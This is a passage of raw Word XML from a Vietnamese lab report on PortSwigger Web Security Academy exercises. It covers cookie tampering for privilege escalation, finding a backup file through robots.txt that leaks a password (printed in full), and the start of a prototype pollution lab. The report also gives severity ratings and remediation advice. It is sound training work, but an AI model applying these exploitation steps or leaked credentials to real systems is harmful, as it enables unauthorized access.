      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00A102CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wiener</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> của </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00294367">
        <w:t>admin lúc ban đầu như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2CF729" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:t>- Ban đầu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57128CA0" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00B8304D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18F248C3" wp14:editId="21DE166A">
            <wp:extent cx="4254719" cy="3905451"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1856669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69053" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId176"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4254719" cy="3905451"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA9C0D2" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00B8304D" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:t>- Sau khi thay đổi và nhấn Send thì kết quả thành công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74572B4D" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00B8304D" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="006E36F3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="600EB57A" wp14:editId="2F54E269">
            <wp:extent cx="6115050" cy="2634615"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5849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767" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId177"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2634615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA100FE" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00D3612A" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="000F79BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mức độ ảnh hưởng của lỗ hổng:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:t>High (cao) vì lỗ hổng này cho phép kẻ tấn công có thể leo thang đặc quyền thông qua việc chỉnh sửa gói tin trên cookie, cho phép truy cập vào tài khoản của người dùng khác (như admin), từ đó chiếm quyền kiểm soát hệ thống. Điều này làm tăng nguy cơ tấn công và xâm nhập vào các phần nhạy cảm của ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3502C8B7" w14:textId="52014141" w:rsidR="00F67FB2" w:rsidRPr="00294367" w:rsidRDefault="00F67FB2" w:rsidP="00294367">
      <w:r w:rsidRPr="00D3612A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D3612A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:t>Đề xuất thiết lập các cơ chế an toàn để kiểm soát truy cập gói tin, bao gồm việc sử dụng bộ lọc cookie để ngăn chặn lỗ hổng Multi-step process và kiểm soát quyền truy cập. Đảm bảo không có khả năng leo thang đặc quyền thông qua chỉnh sửa gói tin trên cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DAF1B1" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc182429524"/>
      <w:bookmarkStart w:id="79" w:name="_Toc182909885"/>
      <w:r>
        <w:t>C04</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF4517">
        <w:t>: Source code disclosure via backup files</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w14:paraId="1D540531" w14:textId="36120350" w:rsidR="00294367" w:rsidRDefault="00294367" w:rsidP="00F67FB2">
      <w:hyperlink r:id="rId178" w:history="1">
        <w:r w:rsidRPr="005F5562">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-via-backup-files</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="653AD256" w14:textId="224D95F9" w:rsidR="00F67FB2" w:rsidRPr="007C6498" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="007C6498">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6498">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00294367" w:rsidRPr="00294367">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:t>ận dụng lỗ hổng tiết lộ thông tin thông qua các tệp sao lưu để truy xuất thông tin nhạy cảm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA40C54" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="007C6498" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C6498">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C79B93F" w14:textId="6C9E811A" w:rsidR="00F67FB2" w:rsidRDefault="00BC4913" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00294367">
        <w:t>ruy cập vào task:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C491B5" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00575B35">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="667EAEDC" wp14:editId="25070A29">
            <wp:extent cx="6115050" cy="1619250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28553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3134" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId179"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1619250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4416B534" w14:textId="1AC397CC" w:rsidR="00F67FB2" w:rsidRPr="00294367" w:rsidRDefault="00F67FB2" w:rsidP="00294367">
      <w:r w:rsidRPr="00294367">
        <w:t xml:space="preserve">Sau khi acccess </w:t>
      </w:r>
      <w:r w:rsidR="00294367" w:rsidRPr="00294367">
        <w:t xml:space="preserve">thì nhận </w:t>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:t>thấy rằng không có thông tin gì nhiều để khai thác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36326DAC" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00575B35">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A1D9160" wp14:editId="7B5ED87A">
            <wp:extent cx="6115050" cy="3307715"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1382880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80835" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId180"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3307715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A63AE6" w14:textId="50E1F580" w:rsidR="00F67FB2" w:rsidRPr="002B1A64" w:rsidRDefault="00BC4913" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="002B1A64">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="002B1A64">
        <w:t>iểm tra các tệp sao lưu có sẵn để khai thác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2E541C" w14:textId="6683B1E2" w:rsidR="00F67FB2" w:rsidRPr="002B1A64" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="002B1A64">
        <w:t>Bằng cách</w:t>
      </w:r>
      <w:r w:rsidR="00BC4913">
        <w:t xml:space="preserve"> v</w:t>
      </w:r>
      <w:r w:rsidRPr="002B1A64">
        <w:t xml:space="preserve">ào route </w:t>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/robots.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="002B1A64">
        <w:t xml:space="preserve"> để xem thì ta thấy được </w:t>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:t>route /backup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5D85BF" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="002B1A64">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00A3C0E7" wp14:editId="252C05B5">
            <wp:extent cx="6115050" cy="875665"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1670525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25025" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId181"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="875665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E0C67C" w14:textId="0C40509E" w:rsidR="00F67FB2" w:rsidRDefault="00BC4913" w:rsidP="00F67FB2">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve">ruy cập đến </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00294367">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/backup</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272B2B36" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="002B1A64">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24E3B58B" wp14:editId="4EB84ABB">
            <wp:extent cx="6115050" cy="1349375"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="765583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83841" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId182"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1349375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2577E2" w14:textId="516AB43D" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="002B1A64">
        <w:t xml:space="preserve">Nhấn vào </w:t>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ProductTemplate.java.bak</w:t>
      </w:r>
      <w:r w:rsidRPr="002B1A64">
        <w:t>, tìm thấy password</w:t>
      </w:r>
      <w:r w:rsidR="00BC4913">
        <w:t xml:space="preserve"> tại đây:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E74EB99" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B1A64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cju7rsr1sa28ad6kiursdkxmz5ju40mq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267F25E6" w14:textId="33B90049" w:rsidR="00F67FB2" w:rsidRPr="002B1A64" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="002B1A64">
        <w:t xml:space="preserve">Đây chính là thông tin nhạy cảm (password). </w:t>
      </w:r>
      <w:r w:rsidR="00BC4913">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="002B1A64">
        <w:t>ử dụng thông tin nhạy cảm này để tận dụng hoặc thực hiện các cuộc tấn công khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DDAFCF" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="002B1A64">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F17D718" wp14:editId="20A365C6">
            <wp:extent cx="6115050" cy="4025900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1590040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40293" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId183"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="4025900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AE8E70" w14:textId="6E278C2A" w:rsidR="00F67FB2" w:rsidRDefault="00BC4913" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t>iến hành nhập password trên</w:t>
      </w:r>
      <w:r w:rsidR="00294367">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109B2A71" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="002B1A64">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37841D4B" wp14:editId="6264A135">
            <wp:extent cx="6115050" cy="3777615"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1356627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27975" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId184"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3777615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB7FD08" w14:textId="05DE6B5D" w:rsidR="00F67FB2" w:rsidRPr="00294367" w:rsidRDefault="00F67FB2" w:rsidP="00294367">
      <w:r w:rsidRPr="00294367">
        <w:lastRenderedPageBreak/>
        <w:t>Kết quả</w:t>
      </w:r>
      <w:r w:rsidR="00BC4913" w:rsidRPr="00294367">
        <w:t xml:space="preserve"> là </w:t>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:t>thực hiện</w:t>
      </w:r>
      <w:r w:rsidR="00294367" w:rsidRPr="00294367">
        <w:t xml:space="preserve"> thành công</w:t>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:t xml:space="preserve"> thử thách của lab này</w:t>
      </w:r>
      <w:r w:rsidR="00294367" w:rsidRPr="00294367">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C72D66D" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00B050BE" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="002B1A64">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49895BB9" wp14:editId="3590B082">
            <wp:extent cx="6115050" cy="2336800"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="976813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13813" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId185"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2336800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C98E81D" w14:textId="109E04FA" w:rsidR="00F67FB2" w:rsidRPr="007C6498" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="007C6498">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mức độ ảnh hưởng của lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6498">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:t>High (cao) vì lỗ hổng này tiết lộ thông tin nhạy cảm</w:t>
      </w:r>
      <w:r w:rsidR="00294367" w:rsidRPr="00294367">
        <w:t>, cụ thể là password</w:t>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:t xml:space="preserve"> từ các tệp sao lưu</w:t>
      </w:r>
      <w:r w:rsidR="00294367" w:rsidRPr="00294367">
        <w:t xml:space="preserve"> (backup)</w:t>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:t>, có thể dẫn đến việc rò rỉ thông tin quan trọng hoặc bí mật của hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423B4BA6" w14:textId="0CA880C0" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00294367">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C6498">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6498">
        <w:t xml:space="preserve"> Cần thiết lập các biện pháp bảo mật cho các tệp sao lưu để ngăn chặn việc truy cập trái phép và tiết lộ thông tin nhạy cảm. Đồng thời, cần xác định và loại bỏ các tệp sao lưu không cần thiết và thiết lập quy trình sao lưu an toàn hơn để giảm thiểu rủi ro tiết lộ thông tin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D20042" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00B050BE" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc182429525"/>
      <w:bookmarkStart w:id="81" w:name="_Toc182909886"/>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00B050BE">
        <w:t>05</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7D45">
        <w:t>: Client-side prototype pollution via browser APIs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w14:paraId="775C1E13" w14:textId="148397A5" w:rsidR="00294367" w:rsidRDefault="00294367" w:rsidP="00294367">
      <w:hyperlink r:id="rId186" w:history="1">
        <w:r w:rsidRPr="005F5562">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/prototype-pollution/client-side/browser-apis/lab-prototype-pollution-client-side-prototype-pollution-via-browser-apis</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="765DC79C" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00D3612A" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00D3612A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D3612A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00294367">
        <w:t>Lỗi ở URL và file JS, có thể thực hiện chèn code vào chúng để có thể truy cập thông qua API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BFA476" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D3612A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0114EEDB" w14:textId="443DAE7D" w:rsidR="00F67FB2" w:rsidRPr="00664855" w:rsidRDefault="00BC4913" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:t>ruy cập vào task và thử ch</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>è</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:t>n một thuộc t</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>í</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:t>nh t</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ù</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:t xml:space="preserve">y </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ý</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:t xml:space="preserve"> th</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ô</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:t xml:space="preserve">ng qua chuỗi truy vấn, </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>đ</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:t>oạn URL v</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
